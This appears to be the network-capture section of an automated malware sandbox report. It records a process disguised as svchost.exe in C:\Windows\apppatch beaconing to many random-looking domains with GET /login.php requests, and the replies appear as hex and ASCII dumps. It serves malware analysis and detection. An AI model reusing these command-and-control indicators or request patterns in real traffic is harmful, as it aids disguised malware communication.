                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            50192.168.2.454054199.191.50.83807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:15.050230026 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            51192.168.2.454055188.114.96.3807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.088488102 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.346888065 CEST795INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:20 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPZoApwY5XQtG%2BfumDCZSMgxtSb0w%2BaOzfA4IORe9LhMbSIZCZ7zPqHffkyHqMIQGDMz8cLc2Cl740uN%2BKLBcluP0l2bbHQWNOeL%2Fh%2Fl9SCD4W4sZOmoWQwzWC8p3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0f95effe438e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.047838926 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.419481039 CEST622INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:22 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqZdfLzOkuVM3N9spqcCP2utkFahnyvVllK%2BG3y8NLXCs%2FH9P303%2F2FMhUW%2FauQ%2FysSZRVArpktXFlAJtx59Ps7vwIljsnwWl0yjJEWXcrMtOafZONFujiaY7NQ2PQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0fa61ab3438e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.514379025 CEST173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            52192.168.2.454056103.150.11.230807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.316461086 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.656668901 CEST402INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:20 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://47.103.150.18:8001/dh/147287063_35134.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                            Sep 8, 2024 09:00:21.692056894 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.196717024 CEST402INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:21 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://47.103.150.18:8001/dh/147287063_35134.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            53192.168.2.45405847.103.150.1880017524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.664362907 CEST288OUTGET /dh/147287063_35134.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 47.103.150.18:8001
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Sep 8, 2024 09:00:21.690274000 CEST722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:21 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.197593927 CEST288OUTGET /dh/147287063_35134.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 47.103.150.18:8001
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.573787928 CEST722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:22 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            54192.168.2.454060103.224.182.252807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.160104036 CEST277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
                                                                                                                                                                                                            Cookie: __tad=1725778797.6242731
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.769872904 CEST242INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:25 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            55192.168.2.454061103.224.212.108807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.218373060 CEST277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
                                                                                                                                                                                                            Cookie: __tad=1725778797.8172407
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.855016947 CEST244INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:25 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            56192.168.2.454062154.85.183.50807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.227638960 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.124829054 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.142214060 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.452591896 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            57192.168.2.45406364.190.63.136807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.778904915 CEST348OUTGET /login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1725778797.6242731
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475111961 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:26 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_M5BqbZPp+vENr8zESfPyY+04ztHDHvxZu+5Nln9IXdhUZ9ZLLpgvh4qJ+8sYoeqEcGQYinx7v2acEmyNRrpPbg==
                                                                                                                                                                                                            last-modified: Sun, 08 Sep 2024 07:00:26 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7768d5b45d-mmf8l
                                                                                                                                                                                                            server: Parking/1.0
                                                                                                                                                                                                            Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4d 35 42 71 62 5a 50 70 2b 76 45 4e 72 38 7a 45 53 66 50 79 59 2b 30 34 7a 74 48 44 48 76 78 5a 75 2b 35 4e 6c 6e 39 49 58 64 68 55 5a 39 5a 4c 4c 70 67 76 68 34 71 4a 2b 38 73 59 6f 65 71 45 63 47 51 59 69 6e 78 37 76 32 61 63 45 6d 79 4e 52 72 70 50 62 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_M5BqbZPp+vENr8zESfPyY+04ztHDHvxZu+5Nln9IXdhUZ9ZLLpgvh4qJ+8sYoeqEcGQYinx7v2acEmyNRrpPbg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475127935 CEST224INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                            Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com h595as it all. We hope you find what you are searching for!"><link rel="ico
